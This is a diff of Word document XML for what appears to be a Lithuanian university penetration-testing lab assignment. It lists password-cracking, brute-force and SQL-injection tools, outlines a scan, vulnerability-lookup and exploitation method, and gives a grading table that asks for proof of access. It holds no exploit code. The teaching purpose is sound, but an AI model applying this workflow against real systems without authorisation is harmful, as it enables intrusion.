-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>John the Ripper / Hydra</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Slaptažodžio nulaužimo įrankis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>SQL pažeidžiamumų injekcijos</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Sqlninja</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>SQL pažeidžiamumų injekcijos, užvaldymas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Snmpwalk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>snmp paketų medis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Hydra</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>brutalios jėgos (brute foce) įrankis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Darbo atlikimo metodika</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
       </w:pPr>
@@ -1887,763 +1086,35 @@
         </w:rPr>
         <w:t xml:space="preserve">Darbo metu atliekamas tinklo skenavimas, aptinkami paslaugų prievadai (servises, ports), jų versijos. Versijų pažeidžiamumų paieška </w:t>
       </w:r>
-      <w:hyperlink r:id="rId17" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>http://nvd.nist.gov</w:t>
-        </w:r>
-      </w:hyperlink>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://nvd.nist.gov" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>http://nvd.nist.gov</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
         <w:t xml:space="preserve"> pažeidžiamumų duomenų bazėje. Pažeidžiamumų paieška Metasploit duomenų bazėje. Pažeidžiamumų išnaudojimas.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Darbo rezultatų vertinimas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="LightList-Accent1"/>
-        <w:tblW w:w="4945" w:type="pct"/>
-        <w:tblInd w:w="108" w:type="dxa"/>
-        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="1364"/>
-        <w:gridCol w:w="1443"/>
-        <w:gridCol w:w="3275"/>
-        <w:gridCol w:w="3658"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-          <w:trHeight w:val="265"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="700" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-            </w:tcBorders>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Studento Vertinimas</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>(balais)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="741" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-            </w:tcBorders>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Galimas maksimalus vertinimo balas</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1681" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-            </w:tcBorders>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Vertinimo objektas</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="1878" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-            </w:tcBorders>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Pastabos</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-          <w:trHeight w:val="265"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="700" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-            </w:tcBorders>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="741" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-            </w:tcBorders>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1681" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Nustatyta pagrindinė informacija apie IP adresų paslaugas (services)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="1878" w:type="pct"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Informacija apie paslaugas, versijos, prievadai (services, versions, ports)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="265"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="700" w:type="pct"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="741" w:type="pct"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1681" w:type="pct"/>
-            <w:tcBorders>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Aprašytas arba pademonstruotas pažeidžiamumas</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="1878" w:type="pct"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Pažeidžiamumas, įrodymai (gali būti darbalaukio atvaizdas, gali būti rezultato iškopijavimas, pvz turite prieigą tai pademonstruota komanda $id „</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>naudot</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>ojo teisės linux aplinkoje“) (exploiting).</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-          <w:trHeight w:val="265"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="700" w:type="pct"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="741" w:type="pct"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1681" w:type="pct"/>
-            <w:tcBorders>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Surinkta informacija apie paslaugų pažeidžiamumus</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Parengti </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>išvadas.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="1878" w:type="pct"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:bCs w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Informacija apie pažeidaimumus (vulnerability)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
